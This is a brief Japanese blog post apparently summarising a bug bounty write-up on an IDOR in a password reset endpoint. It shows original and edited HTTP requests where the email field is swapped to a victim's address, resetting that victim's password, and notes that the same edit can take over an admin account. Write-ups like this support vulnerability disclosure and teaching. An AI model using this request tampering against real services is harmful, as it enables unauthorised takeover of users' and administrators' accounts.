Hello there, ('ω')ノ
アカウント乗っ取りへのシンプルなIDORを。
脆弱性:
IDOR
アカウントの乗っ取り
記事:
https://medium.com/@swapmaurya20/a-simple-idor-to-account-takeover-88b8a1d2ec24
IDORは、安全でない直接オブジェクト参照を指して。
これは、許可されていないものにアクセスできるか。
そのWebアプリケーションでそのアクションを実行する権限がないことを意味して。
今回は、ターゲットをexample.comと呼ぶことに。
最初にログインページ、登録ページ、およびパスワードを忘れたページをテストして。
忘れたパスワードをテストしているときに。
ユーザがパスワードを新しいパスワードに変更すると。
Eメールパラメータが新しいパスワードと一緒にリクエスト本文に存在し。
新しいパスワードパラメータを確認することがわかったので。
Eメールを他の人のパスワードに変更することに。
元のリクエスト:
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”attacker_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
編集されたリクエスト:
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”victim_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
すると編集されたリクエストをBurpで転送した後に。
被害者のアカウントのパスワードが変更され。
ブラウザで被害者のアカウントに直接ログインできて。
管理者アカウントのパスワードを変更して。
管理者アカウントへのフルアクセスを取得することで。
影響を大きくすることができて。
Best regards, (^^ゞ